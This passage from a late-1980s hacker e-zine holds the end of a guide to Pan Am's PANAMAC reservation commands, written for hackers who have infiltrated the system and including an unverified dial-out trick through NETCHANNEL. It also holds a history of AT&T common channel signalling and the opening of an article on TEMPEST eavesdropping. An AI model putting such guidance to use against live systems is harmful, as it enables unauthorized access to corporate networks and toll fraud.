or text is mandatory for this entry. The period(.) which acts as a separator
preceeds the text. All SSR entries regarding excess baggage must include a text
and may relate to only one passenger
When redisplayed, the HA FAX field now apprears follows:
HA FAX
1.SSRVGMLPAGS01 PA0066P19APRJFKBOM 1 SHAH/RMR
2.SSRKSMLPAHSO1 PA0066P19APRJFKBOM 1 TUC/AMR
3.SSRXBAGPANN0175KG PA0066P19APRJFKBOM 1 TUC/AMR RECORDING EQUIPMENT
SSR Name relating
-----------------
In from of each name is a name item number. You already know that PANAMAC
assigns numbers for each different surname in a PNR. Also, each passenger
has a passenger name number. In the FACTS example so far, the item number and
the passenger name number were the same.
A B C
1. 1AOKI/LSMRS 2. 1YAMADA/YRMRS 3. I/1YAMADA/GLENMSTR
1,2,3 are Name Item NBR & the A,B,C are passenger name numbers
When you relate an SSR fact, your entry really refered to the name item i.e
N2 refers to all the passengers in name item 2 (in this case only Mrs. Yamada)
If however the entire Yamada family had been travelling together as in the
following example the name item include more than one name:
1.1AOKI/LSMRS 2.3YAMADA/GOMR/YRMRS/LAMISS 5.1/1YAMADA/GLENMSTR
1 PA 82 Y 16 NOV HNLAX HS4 2300 0604
1 PA 81 Y 28 NOV LAXHNL HS4 1300 1702
If you SSR entry showed name relation to name N2, then the request would be for
all the passengers in NAME ITEM 2... Mr/Mrs/Miss Yamada/
To show a special request for only one passenger in a name item, use a slash
(/) after the name number. The slash acts to "separate" an individual
passenger from the name item may which may include multiple passenger.
For example: Mrs Yamada is name NBR 3. To confirm a baby meal on both flights
the entry would be:
>4A BBML FS1 S1/2 N3/
The N3 indicates the name number only
Change/Delete/Cancel
--------------------
If you are in the process of making an SSR entry and you have ended the
transaction, no action has yet been taken on the request, You can therefore
delete the entry. For example
>4 3 [change symbol]
You on the other hand while at home can user "*" which works the same way.
The 4 is the field, the 3 is the Fact ITEM number .
You cannot modify an SSR entry to correct it. If your entry is incorrect, you
must delete the entry and reenter the correct SSR fact itme.
In all instance, whether working on a new or retrieved PNR, cancellation of
an itinenary segement will automatically cancel the related SSR item.
For e.g. you have booked:
1.1BROWN/HARRYMR 2.1TOBAR/EMILEMR
1 PA 100 Y 13NOV JFKLHR HS2 1000 2140
Before ending transaction you notice you accidentally confirmed the wrong date.
After cancellation of the incorrect segment, the HA FAX SSR item will look
like this:
HA FAX
1.SSRKSMLPA(XX)02 PA0100Y13NOVJFKLHR 1BROWN/HARRYMR 1 TOBAR/EMILEMR
Cancelled SSR entries will automatically be removed from the PNR when you
End Trasaction. Now you would rebook the correct flight and the Kosher meals.
Part X
------
Other Airlines...General Facts
------------------------------
The GFAX or the General Facts, 3 filed contains the same (2) types of entries
as the Host Fax...OSI and SSR..Entries in the GFAX are included to outgoing
messages to other airlines upon ending trasaction. When an itinerary includes
space on another airlines, you must use the GFAX field to notify the other
airline about the special requirements or service information.
All entries in GFAX befin with the digit 3. To send "OSI" information to one
(1) other airlines, use the applicable carrier code. For instance, if the
passenger is an infant travelling on PA and AF, you notify Air France that you
booked an infant by sending an OSI message. The entry is:
>3 OSI AF INF JONES/MARK MSTR 5 MTS
This is in addition to an OSI entry in the 4 field to notify Pan Am at the
airport, Thus 2 entries with the same information are required.
>4 OSI PA INF JONES/MARK MSTR 5 MTS
If a passenger's itinenary include more than one other airline, use the letters
"YY" as the carrier code and make only one GFAX entry. A "YY" will send the
information to all the airlines in the itinerary.
>3 OS1 YY INF JONES/MARK MSTR 9 MTS
Change/Delete
-------------
The input to delete an OSI in the GFAX filed is the same as in HFAX.
>3 1 (change symbol)
To change an OSI entry in the GFAX field the format is the same. You delete,
then reenter the correct information.
>3 OSI AF.... (NEW INFO)
GFAX SSR Entries:
-----------------
SSR entries for other airlines are very similar to Pan Am HA FAX entries. The
entry begins with "3A", followed by the segment and name related request.
For e.g
>3A KSML NH1 S1 N1
Breakdown
3A - This is the GFAX special service request
KSML - Meal code
NH1 - Action code to request
S1 - Segment number
N1 - Name item number.
Any SSR entry to another airline is always on a request basis (NH)
The request message is forwarded to the applicable airline(s) and must await
a reply. Meanwhile, the passenger is adivised the Pan Am has requested the
special service from the other airline(s) involved.
Assume that you have made the following reservations:
1.1WILSON/ERMR
1 PA 218 Y 26FEB CCSJFK HS1 X 0940 1420
2 DL 1425 Y 26FEB JFKSLC HS1 1805 2040
The passengers desires a vegetarian meal and will be taking his dog (weight
30 lbs) with him. To book the SSRs on Pan Am the entries are:
>4A VGML FS1 S1 N1
>4A AVHI FS1 S1 N1 . DOG 30 LBS (AVIH = live animals in hold)
To book the SSRs on Delta Airlines the entries are:
>3A VGML NN1 S2 N1
>3A AVIH NN1 S2 N1 . DOG 30 LBS
Change/Delete
-------------
To cancel or delete items in the GFAX handle exactly as in HFAX.
Before end Transaction: >3 1 (change symbol)
On a retrieved PNR: >3 . 1 XX
Encode/Decode ARIMP Abbreviations
---------------------------------
"ARIMP" codes are abbreviated messages which are used to communicate within
the airline industry. These are listed in Panamac's "KI" information systems
and may be accessed using the following entries:
To find the code for a message (ENCODE), enter:
>KI COD _ (using first letter of subject)
To DECODE an abbreviated message, enter:
>KI DCO _ (using first letter of subject)
Part XI
-------
Advance Seat Assignments
------------------------
It is Pan Am's policy to assign seats prior to departure only when requested
by passengers. As you know many of us may want specific seat numbers or certain
area for e.g smoking,non-smoking,window seats,aisle.Seats have to be requested
when the booking is in progress.
Lets take an example. Lets say you have booked a seat for Mr. Davdison on
he has requested seat 3A which is in the non-smoking area and in the first
class (P) cabin. His entries looks like:
1.1DAVIDSON/PLDR
1 PA 30 P 19APR JFKLHR HS1 X 1200 1800
2 PA 40 P 20APR LHRNBO HS1 100 700
To book his request a Host Facts entry is made. For e.g:
>4A NSST NN1 S1 N1 . SEAT 3A
4A - Explained before
NSST - is code for Non Smoking Seat
NN1 - is the action code
S1 - Segment 1
N1 - Name 1
. - Separtor which is compulsory
3A - This is the requested seat
If this seat is available then you will get a "*". A display of the PNR will
show the following:
1.1DAVIDSON/PLDR
1 PA 30 P 19APR JFKLHR HS1 X 1200 1800
2 PA 40 P 20APR LHRNBO HS1 100 700
HA FAX-SSRNNSTPANN01 PA0040P19APR JFKLHR 1DAVIDSON/PLDR SEAT 3A
If the seat is already taken then the output will be:
RE-CHECK AVAILABILITY/REJECTED DATA FOLLOWS/4SSRNSSPANN01 PA0030
P19APRJUNJFKLHR 1DAVIDSON/PLDR SEAT 3A
To print an availability display (seats available) seat map must be displayed.
Enter:
>AC /S2 *
AC - is the availability cabin
S2 - This is the segment 2
* - Display
You will get something like this:
-PA0040P019APR JGKLHR 747-121 ZONE MAR AVAILABLE 9
* MOVIE SHOWN BETWEEN JFKLHR
A B C D E F G H J K
P P 1 1 $
A* A* 2 2 C F
$ A* 3 3 A* A*
05----------
As you can see from the display that the requested seat is taken. The symbol
use here is "$". Now lets get into the explanation.
PA0040P19APR - Flight/Class/Date
JFKLHR - Board/Off points of the segment booked
747-121 - This indicated the equiment used on the flight
NMR - Zone requested "N" - No smoking
"M" - Movies
"S" - Smoking
"W" - Without movie
AVAILABLE 9 - Total number of seats still available to confirm.
MOVIE SHOWN BETWEEN JFKLHR - Information on which sector the movie will be
shown.
A* - Indicates that if given the option, confirm these seats to passengers
first. For e.g Seats 2B
3A B H J
$ - This indicates that it is taken. e.g Seat 1 J
2 A
- Blank indicates that seats dont exists on the aircraft
P - Seats behind a partition or bulkhead.
F - Special seating . People that require special seating ot handling
C - Compulsory seat usually assigned to F seats.
05-------- - This indicates the last row in the zone and /or compartment
in this case Premium, First Class.
Some other commands:
> AC/S1*S - Use this entry command if passengers request smoking
> AC/S1*W - Without movie ( No smoking is assured)
> AC/S1*WS - Without movie , Smoking specified.
Part XII
--------
When originating a PNR if a passenger decides to cancel and book a different
flight the seat confirmation will automatically be cancelled as in this
example (partial PNR display):
1.1BRESLIN/BMS 2.1CARTER/ASFR
1 PA 102 Y 26JUN JFKLHR 2100 0840
HA FAX-SSNSSTPAH02 PA102Y26Y26JUNJFKLHR 1IBRESLIN/BMS 1 CARTERASDR SEAT
33 AB
Segment 1 cancelled
X1
NEXT REPLACES 1
FLT//SEG FACTS CANCELLED
*R
1.1BRESLIN/BMS 2.1CARTER/ASDR
HA FAX-SSRNSSTPA(XK)02 PA102Y26JUNJFKLHR 1BRESLIN/BMS 1 CARTER/ASOR SEAT
33 AB
Should a passenger wish to verify the seat description and/or location of his
seat. There is an entry to display a seat map. The entry is:
>VSSPA106/31JULIAADLHR*27
VSS - is the Verify Seat Selection
27 - This is the row.
The response will be:
PA0106 1AD/LHR 31JUL
Y 747-121 ROWS 27 ZONES LAST ROW F/ 7 C/19 Y/57
A B C D E F G H J K
N M N M N M 21/NM N M N M N M 27/ N M N M N M
| |____ |
| | |
no smoking Movie ROW Number
Row 27 is a no-smoking seat, with a movie view, over the wing
Part XIII
---------
This past will teach you all about hotels. I dont plan to go into details on
this but will just make you familiar.
There are 4 catagories of hotels:
1. Intercontinental (IHC) the Grand Metropolitan Hotel chain
(XM Inventory stored in the system
2. Sheraton
(XM Inventory stored in the system)
3. Other hotels (Special Arrangement)
(XP Availability )
4. Unlisted Hotels
The XH and XM hotels have the actual inventory of thier rooms stored in
the system and together with XP hotels the three types give you immediate
availability. The hotels with whom Pan Am has a booking agreement are listed in
a City's Station Information. To display the hotel for a city the input is:
>KIBKKH
BKK is the 3 letter city code and H stands for Hotels. The response to this
would be something like:
BKK STATION INFORMATION
HOTEL INDEX
1000 KENYAN CONTINENTAL
1023 SHER BANKOK HOTEL
2351 * TAMARIN *
2342 ASIA
:
etc
The hotels are further identified in the hotel Index by a four digit number,
their name and location if ot er Ahat the headline City it will be displayed
as "* TAMARIN *"
To determine of the hotel is "XH", "XM" or "XP" and to display details about a
hotel the input is:
>KI[Four digits Hotel Index]
Here is what the response may look like:
BKK HOTEL INFORMATION
1009 SIAM INTERCONTINENTAL
SIAM INTERCONTINENTAL
SIOUT PLACE 4290 HACKERS ROAD * TEL 000000 *
SIAMICH XH XH 0923
LHTL XH0923 H C PVKGBD0N
AS TL EP BHT EP P K D0N
04 00 01JAN-30DEC89
MODR SGLB 1840
DBLB 2000
TRPB 2390
: :
: :
GCR - JAN/JUN SGLB 1600 DBLD 1820
JUL/DEC SGLB 1600 DBLB 1820
NOTE LANAI ROOMS AND GROUND FLOOR ROOM ARE ON PERMANANT REQUEST
GUEST WILL BE MET AT AIRPORT BY HOTEL REPRESENTATIVE AND ASSISTED TO HOTEL
:
:
:
LOCATION - CENTERS OF CITY OFF SIAM AQ. WITH EASY
ACCESS TO ALL SECTIONS OF THE CITY
THREE MAIN FROM ROYAL BKK SPORTS CLUB
NATIONAL STADIUM.
TRANSPORTATION - 35 MIN BY TAXI ARPT
25 MIN BY TAXI TO DOCK
SERVICES- ROOM SVC 24 HRS LAUNDRY/VALET 24 HRS
SPORTS - POOL,GYM ROOM,SHOOTING
END
The sixth line contains the booking code (in this case XH0923)
This display has been shortened to make things easy.
Hotels are booked in 2 ways:
1) Short Selling them using HOTEL booking code
XH ........ >N1 DBLB XH1122-10OCT 15OCT MODR
XM ........ >N2 SGLB XM1355-05MAR 12 MAR MAXR
XP ........ >N1 TWNB XP3087-02JUL 9JUL MODR
2) The other way is a Segment entry for UNLISTED.
>0 HTL PA NH1 ROM 1N23-JUL-OUT30JUL DBLB MODR DORA
Part XIV
--------
Personell who can access the Pan Am main computer may also be able to call
out. I am not positively sure about this because this info was recently given
to me by a Pan Am employee. Enter as follows:
>HOLD NETCHANNEL 1
There may be many netahannels in the systems. If it is occupied then it will
give a "CHANNEL 1 BUSY" error.
Then it will prompt you for a call out password. This is different from your
login password.
Password : XXXXXXXXXX
Then the immediatly after that it will give a prompt "#" . This is where you
will be able to input digits to call out.
# (317)5552322
Part XV [Misc]
--------------
Airline Codes
-------------
Pan Am, and all other airlines, use a two-letter airline identification code
for reservation and ticketing purposes. There is no hard and fast rule as to
how the two-letter code is derived. These codes are assigned by IATA/ARC.
This list contains some of the worlds major airlines.
Hope this list will come in handy.
Airline Airline Code Airline Airline Code
------------------------------------ -----------------------------------
AER LINGUS EI AEROFLOT SU
AREOLINEAS ARGENTINAS AR AERO MEXICO AM
AIR AFRIQUE RK AIR CANADA AC
AIR FRANCE AF AIR INDIA AI
AIR NEW ZEALAND - INT. TE ALASKA AIRLINES AS
ALITILIA AZ ALOHA AILINES AQ
AMERICAN AIRLINES AA AUSTRIAN AIRLINES OS
AVENSA VE AVIANCA AV
BRITISH AIRWAYS BA BWIA INT. BW
CAAC - CHINA CA CATHAY PACIFIC AIRWAYS CX
CHINA AIRLINES CI CONTINENTAL AIRLINES CO
CP AIR (CANAIAN PACIFIC) CP DELTA AIRLINES DL
EASTERN AIRLINES EA EL AL LY
GULF AIR GF HAWAIIAN AIRLINES HA
IBERIA IB INDIAN AIRWAYS CORP. IC
JAPAN AIR LINES JL KLM ROYAL DUTCH AIRLINES KL
KOREAN AIR LINES KE LACSA LR
LAN-CHILE LA LUFTHANSA LH
LIAT LI MEXICANA MX
NORTHWEST NW OLYMPIC AIRWAYS OA
PAN AM PA PIEDMONT AIRLINES PI
QANTAS QF SABENA SN
SAS SK SAUDIA SV
SINGAPORE SQ SOUTH AFRICAN SA
SWISSAIR SR TAP (AIR PORTUGAL) TP
TWA TW UNITED AIRLINES UA
US AIR AL VASP AIRWAYS VP
VARIG RG
Conclusion
----------
Hope all have found this article of some intrest. My apologies for the lenght.
I have tried my best to include all major topics that may be usefull to the
hacker. I suppose now you know that booking flights is not that easy process.
So next time please dont start yelling at the poor sales agent for some minor
problem.
Using this system can be a lot of fun. Although one can create a major havoc
after infiltration. I urge you all not to do any of that sort. This system is
quite delicate and one should be very carefull when using it. All the reverse
command processes have been included in this article. I have purposely left out
some commands that proved to be harmfull to the system.
Under no circumstances am I responsible for this article's contents, for this
serves only as an educational tool.
I would like to thank Mr. C of the Pan Am Security Division for all his help.
If anyone wishes to get in touch with me, I can be contacted at the Hacker's
Den or at the Phoenix Project.
Best of luck!
Red Knight
@ Phun Magazine Inc.
Hackers Den88 (718)358/9209
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
= P/HUN Issue #3, Volume 2: Phile #7 of 11 =
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Common Channel (InterOffice) Signalling: An overview
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
By Tubular Phreak
References:
o - BTJ!
o - AT&T comunications
o - Tel-Network planing
This article will inform you of the stages CCS has gone through over the past
years.
CSC known originally as Common Channel Interoffice Signalling was introduced
back in 1976. Since its introduction it has added datagram direct signalling
and has been modernized by new digital and proccesor technology
and by delvelopments in software enginerring techniques.
This prevents Blue Boxing due to the fact that signals are carried over a
different link than voice.
CCIS net improved its the old trunk signalling bettween SPC (Stored Control
Program) toll switches thereby increasing speed and its economical.
The CCIS network was composed of what know as STPs(Singal Trasfer Points)
CCIS Network
------------
Region #1 + Region #2
** + **
| + |
| + |
| + |
(SPC)------** **----(SPC)
|________________________|
** - STP mated pair
__ - Voice Trunks
| - Links
+ - Divider
The Datalinks use 2.4 kb/s(kilobytes per second).In 1979 they used 1A switch
was added.
Later in 80 they added a special feature of direct signalling (datagram)
which operate at 4.8 kb/s. This capability provided the SPC machines with
the neccesary information through the CCIS Net.The allowed NCP (Network Control
Points). The NCPs connect directly to CCIS at certain STPs.
The SPC machines quired the NCPs and receives the instructions for the action
in response.Therefore they became known as ACPs(Action Control Points).
This status if the CCIS provided 800 services and calling cards.
In 1985 the siganlling network added 2STPs and 56kb/s.This new network was
called CCS7. This new method of signalling used CCITT No.7 Protocol and with
it new more efficient feature came like ISDN.
Archaic CCIS in 76'
~~~~~~~~~~~~~~~~~~
Before the introduction of CCIS, SF/MF signalling method was in use.
The SF was responsible in determining the idle/busy side state of a trunk.
2600 Hz the idle trunk was removed when a call was to be placed on the trunk.
Then MF signaling was used to determine routing information to the distant
end and when the party answered the SF was removed from there side.
Tandem switching was not economical and was slow.
As the introduction of SPC came about in which common control equipment was
based on electronic procedures, the overhead associated with the call setup
became a more dominant factor. MF/SF signaling was used until a toll switch
ESS4 was introduced in 76'. Therefore AT&T produced CCIS in assocation with
the ESS4 toll switch. Signalling used a different link than voice.
As mentioned above CCIS used 2.4/kb signalling links to transmit the signal.
Due to the fact that one 2.4/kb could could provide for more than 2000 trunks,
therfore the a regional STP was put in place.
Each STP was connected to several toll switches.Each regional STP was connected
to each of the distant STPs.Each STP was connected to its parner which provided
a path for connections between switches if there was a failure of distant STPs
The STPs in the network were provided by a portion of the processor associated
with the 4A-ETS(Electronic Translator Systems). Message routine within the
STPs was performed by a band and lable scheme that defined a virtual signalling
circuit where 512 bands of 16 trunks coule be accomodated. This allows 8192
voice trunks to be uniquely identified on a specific signaling link.
Direct Dialing Signalling(1980)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
In 1980, a direct signalling capability was added to the CCIS Network. This
capability allwed messages to be sent from a signalling point to any other
signalling point in the network and supported a new network architechture in
which a portion if the switched network routing instruction could be placed an
a database shared by multiple SPC switches.
These common databases became known as network control points (NCPs). The SPC
switches became known as action points (ACPs). because they performed actions
based on instructions from NCPs. This required an inquiry-response in the
Common Channel Interoffice Network.
This communication between ACPs and NCPs was performed by a new feature called
Datagram Direct Signalling. Unlike banded(trunk) signalling. This method of
signalling directed messages on a destination-routing basis through all the
Singal Tranfer Points. Therefore the direct signalling messages included a
unique destination address that was used by the STPs to route the message based
on a table that associated destination addresses with physical points in the
network. With this, the CCIS network could direct messages to individual
functions allowing the introduction of unique services such as advanced 800
with features like time of day routing call prompter and customer-controlled
routing of traffic based on information stored at central databases.
CCIS Network Growth
~~~~~~~~~~~~~~~~~~~
As the AT&T network grew both in terms of SPC swicthes and volume of traffic,
it became necessary to augment the initial CCIS network capability. First the
number of STP pairs was increased from the initial 10 pairs to 16 pairs.
Three of the additional -airs were used as area STPs, which served the trunking
needs of the portion of the network. The remaining 3 STP pairs were associated
directly with NCP pairs and performed a direct signal funtion. In addition
the message handling capacity of the network was increased by deploying 4-8kb/s
signalling links in place of the original 2.4kb/s links.STP processing capacity
was also increased as the original shared use of the ETS processor was removed
when the switch function at each STP location was transfered to a new 4 Elect-
ronics Switching System machines.
The Impact of AT&T Divestiture on CCIS Network
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
On January 1, 1984 the court-ordered AT&T divestiture became effective.
Divestiture establishment local access and transport areas (LATAs), which
defined local markets areas. AT&T became an inter-LATA carrier providing
communication services between these LATAs. Under the divestiture agreements,
the STPs,NCPs,and interconnecting data links were assigned to AT&T. The minor
use of these facilities by the divestiture BOCs(Bell Operating Companies) was
provided under contract.Equal access to the inter-LATA carriers under
divestiture was provided mostly by MF/SF signalling. However a new multi-stage
MF outpulsing arrangement was added to forward the orginating number to inter-
LATA carrier for billing and other purposes.
Common Channel Signalling 7 (1985)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
During 1985, the STP capability was enhanced by the introduction of 2STP based
on the AT&T 3B20 duplex (3B20D) processor and an associated processor inter-
connect capability (PIC).In addition , 56-kb/s digital facilities were provided
between the STPs. The 2STP uses the CCITT Signalling System 7 protocol and
provides message transfer part (MTP) function. The MTP can route a message
reliably and qucikly from one point in the signalling network to any other
point. The resulting network has been named the CCS7 network. Initially, the
CCS7 network was used to augment the trunk signalling capabilities of the 1STP
network using the embedded CCIS6 (ECIS6) protocol. ECIS6 interacts with CCS7
and allows switching systems connected to the 1STP network to communicate with
other switches connected to the 2STP network.However during this transitional
period, all switching systems are connected to either the 1STP or 2STP
locations via 2.4 or 4.8 kb/s signalling links.
CCS7 Destination CCIS (1986)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
In 1986 the CCS7 network was expanded to include direct signalling. This was
done by adding new capabilities in the NCPs to allow 56-kb/s connecting links
and the ability to route direct-signalling messages within the 2STPs. For
transitional compatibility, a new destination CCIS6 (DCIS6) interworking
protocol was deployed. The 4ESS and 5ESS switches in the network will use the
Integrated Services Digital Network User Part (ISDN-UP) to control call setip
and will have the capability to support ISDN services. The ISDN-UP will use the
services of the already deployed MTP and provide a broad set of switched
digital services.
Evolution of NCP Serices to a Distibuted Architecture
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The increasingly demanding requirements of call processing services such as the
AT&T card service, advanced 800 and software defined network (ISDN) have led to
a steady evolution of the NCP architecture toward more distribution. This is to
increase versatility of the usage, flexibity of growth and performance. At the
same time we will be able to introduce more new services. The orgianl NCPs
introduced in 1980 consisted of AT&T 3B20 duplex processors and multiple disk
drives. The 3B20D handled all the fucntions including query processing database
admnistration and updates and signaling. The first step toward a distriuted
NCP architecture was in the signalling architecture. In 1985 the NCP
incorporated a highly reliable processor interconnect capability(PIC) with the
same technology used in the 2STPs. It provides communication between the CCS
network and the NCP application databases in the 3B20D host Signalling links
from the STPs to an NCP terminate through link nodes(LNs) on the PIC.The CCS
query messages could access an NCP through the LNs and travel to the
appropriate database application in the 3B20D. Similarly query responses
destined to the CCS network could exit from the NCP through the PIC and the LNs
The future NCP architecture will continue to serve host to the NCP distributed
enviroment and the PIC will remain the vehical for the interprocess
communication and signaling-link termination. To attain distributed query
processing, the NCP database architecture will feature the intergration of
multiple transaction-processing components.
CCS7 Network Interconnection
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
With the potential for end to end signalling services and the adoption of CCS7
standards, there is a growing effort to connect networks of different carriers
and different countries as well as various privately owned networks. It is
expected that in the future all North American networks will have CCS7.
Therefore AT&T is currently involved in defining standard CCS7 interface for
use between netwroks. Initially, the new interface will consist of 2STPs
deployed in pairs.This network configuration assumes that interconnecting will
use designated STPs as gateways. The gateway STPs will be required to screen
all incoming message to prevent unauthorized use of network resources and
services :-)
Interconnecting networks using designated STPs as gateways.
Network
boundary
Network 1 (AT&T) | Network 2
_____ ______ | _______
|\ | |\ | | | |\ | |
| \ |----------| \ | |___|__| \ | |
|__\| |__\_|_| | |__\_|_|\
| \ | | | \
| \ | | | SPC Switch
| \ __|___ | | /
| \______|\ | | | ___|___/
| _____| \ | |___|__|\ | |
|______| |__\_|_| | | \ | |
Gateway | |__\_|_|
2STP mated pair | Gateway STP
| mated pair
|
The figure below shows interconnection of a small network that does not have
STP gateway.
Network
boundary
Small network 3 | AT&T CCS7 netowrk
|
______|_________%%%%
/ | %%%%
/ |
+++++++++ / |
+ SPC +/ |
+switch +\ |
+++++++++ \ |
\ | 2STP mated pair
\______|_________%%%%
| %%%%
The same arrangement that is being used domestically is currenlty being inves-
tigated for application to the CCITT No. 7 message transfer part/telephone
user part (MTP/TUP) international network interconnection. However because of
differences between national networks, international interconnection is more
complex. With the implementation of ISDN-UP for international signalling in
early 1990s, it is expected that many of the existing domestic services will
be extended to embrace the international networks as well.
CCS7 Support for ISDN Services
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Common Channel Signalling was designed for signalling between network entities.
ISDN protocols are designed for out of band signalling all the way to the end
user.Much of the current effort in ISDN is in defining protocols and
architectures for providing the out of band signalling from the end user
premises to the network.However to provide end to end service the network has
to transport the end user's out of band signalling, using CCS or other means.
An important benifit of CCS7 is its inherent ability to support feature
transperancy i.e., allowing of passing of information that can only be
interpreted and used by end users.This capability can be attained by
interworking the ISDN Q.931 protocol with the CCS7 ISDN-UP and extending ISDN
to switched access users through network interconnection.
Methods of supporting CCS7 features transparency include:
o Message-associated user to user information
o Temporary and permanent signalling connections.Message associated user to
user information could pass along with regualar CCS7 call control messages
as opposed to using signaling connections specifically established for that
purpose. The transfer of transparent inoformation would generally be done
after the signalling connection (temporary or permanant) is established but
message associted transparent information could be transfered during the
establishment and/or termination phases of the signaling connection.
Both AT&T and the regional BOCs are deploying ISDN signalling in their networks
Once in place, ISDN offers capabilities such as
o Per-cali selsction of services and bandwidth
o Combined voice,data and even video on a single call
o Calling-number identification at the terminating end (for example, a digital
display for the calling number during ringing)
o Sophisticated multimedia teleconferencing capabilities
Futhermore ISDN will be able to make it possible to add new features and
improve the implementation of the exsisting services such as support packet
transmission and separation of the call/control from user control information
in ISDN.
Potential CCS7 Network Enhancements
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The future CCS network will probably be configured as follows:
1) The ISDN-UP will be used throughout North America.As local carriers adopt
CCS7 network interconnect will provide for end to end digital services. The
signalling connection control part (SCCP) will be used to provide data
capability for ISDN user to user information.
2) The CCITT No. 7 protocol will be used internationally.First the telephone
user part (TUP) will provide basic call setup to countries that chose to use
this protocol initially. However because of its increased flexibility and
support for digital services, the ISDN-UP will be used to extend domestic
ISDN services worldwide.
3) The interconnection with local exchnage carriers as they expand their own
CCS systems will enhance LATA access services and allow new inter-LATA
service.
4) AT&T services will evolve as the flexibility and capacity of the CCS7 of the
protocol is utilized.The transaction capability and part (TCAP) will provide
an effecient protocol for direct-signalling query and responses, to support
new databases and switch-based services.
The interworking of CCS7 with the Q.931 ISDN access protocol will allow end
to end services that are not possible with in-band signalling and will
provide more effective and innovative use of work.
Conclusion
~~~~~~~~~~
The evolution os the AT&T common channel signalling system has been shown to be
a critical part of the AT&T network and services. It has provided a cost
effective means of providing flexibility in the marketplace. The system
is expected to evolve as new capabilities and need are indentified.
Tubular Phreak NUA!
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
= P/HUN Issue #3, Volume 2: Phile #8 of 11 =
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
WHO'S LISTENING
---------------
By Capt. Zap
Over the years, there has been a number of different studies and
discoveries that would alter personal and electronic security over
time. Devices able to "listen" to almost any form of communications
have become commonplace and are available "over the counter" from a
varied number of sources. Such units range from ten to fifteen dollars
to expensive set-ups that employ microwaves and lasers for the
interception of almost any audio signal in the spectrum. But now with
somewhat needed protection from outsiders in reference to this
problem, a number of solutions have been put in place and global
protection is insured in environments that have such need. But the
coverage of environment has had a a major change in protective attention
now being place on the actual electronic emmanations that are so common
with todays standard electronic apparatus. Electronic telephones,
computers and communications networks, ATM's, radio and television
stations are just part of the overall electronic bubble that we have
placed our society into with the hopes of providing better and faster
methods to make daily life a bit easier. But with such a fragile structure
as the electronic bubble, we have new opportunities to discover secrets
never before possible due to the lack of technology. The same technology
that helps us in one way or another may also be helping others
unbeknownist to those who are protecting the environment in the first
place. Signal leakage, either by design or by accident may lead to total
collapse of protective measures due to "wide open spaces" in the
protective sphere. In this particular paper, we will discuss the possible
problems of common office technology may bring in un-securing your
installation.
Our main focus will be in the areas concerning with the emmanations
or transmissions of "Tempest" frequencies. "Tempest", is the code name
given to a specfic area concerned with radio frequencies radiated by
computing equipment by the U.S. Dept. of Defense. This "concern" from
such equipment dates back to the late 50's. The concern ranged from the
possible interception of "informational information" by sources other
than the intended users of such. The problem is more easily reconigized
by the current requirement of normal electronic equipment having to
conform to emmision standards put forth by the Federal Communications
Commission in reference to the amount of electronic "noise" generated
by common standard technology so that such signals do not interfer
with other such pieces of equipment or their operations.
To describe in simple terms, Tempest frequencies are almost straight
through from commerical AM stations to the upper reaches of 600 Mhz.
They are generated or transmitted by any number of different common
daily life electrical and electronic systems. Your TV puts out one
frequency, the stereo another, the common electronic telephone,
cordless phones still another, the microwave oven puts out another and
the wireless alarm does it to, and story goes on. So just as all of these
pieces of equipment emmit a signal, so does the personal computer.
We will describe two possible examples of such informational information
and the abilty for some with directed intent to cause potentially fatal
results due to the use of directed "noise". It should be noted that
the current specifications for "Tempest" approved systems is considered
classified by the DOD and these specs were not available to the author.
But if one was to look at the specs for normal computing equipment
and reduce the allowed emmission output by at least 50 percent, that
may be a realistic emmission standard accepted by the DOD.
Example 1
"We had better "Czech" this out!
-------------------------------
In 1987, a very strange occurence concerning forgein nationals from
an Eastern bloc nation entered this country in a large camper-like
truck via the border checkpoint at Niagra Falls, New York.
The visitors numbering 4 or 5, were in the country under tourist visa's
and were reported to be representives of the countries automobile and
truck industries here on a promotional tour to garnner interest in their
exportable products. The one problem with the "visitors" is that none of
them had any connection with such industries in their home country.
In fact, the visitors were far from what they supposedly represented.
The group descripton read like a Whos' Who of mid-level management of
Eastern bloc intelligence operations. The group reportedly consisted of
a nuclear physists, a specialist in aerial map-making complete with a
small ultra-light powered aircraft, a communications and computer expert
and two communist party officals.
Over a 5 month period, the group was reported to have visited 17 states
looking at 40 to 48 sites dealing with military and defense contractor
sites. The vehicle and its occupants were reportedly followed by over
100 agents of the FBI, NSA, Secret Service and State department and at
least one over flight of a military reservation was reported. Even though
the overflown site was not identified, one site was. This site, was the
"sensitive" naval communications center for the Pacific Fleet located
in San Diego. It was reported that the truck and it's occupants were
parked a few hundred yards from the facility for several days and
according to law, were in no violation of any current statute at the
time. The group was also at or around at the 2800 acre North Island
Naval Air Station based in Coronado, California. The spokesman for the
base stated that you could not see much of anything going on except for
the take-off and landing of aircraft which you could see from almost
any place.
Common sense states that you do not have to be inside the facility in
either a physical or electronic standpoint to collect information. You
can park in any lot or street close enough to your supposed target and
stick up your antennas. No property violations, no photo restrictions to
comply with, no restrictions at all because you are sitting in a public
place, parked or having coffee with your "ears" on. A good example of
such parking was reported in a paper published in Computers and
Security 4, titled Electromagnetic Radiation from Video Display Units:
An Eavesdropping Risk? by William Van Eck, copyright 1985. He stated
that when they were conducting their experiments in the open on public
roadways, with a van and antenna system that was quite noticable,
no one asked what they were doing or had any thought about the time
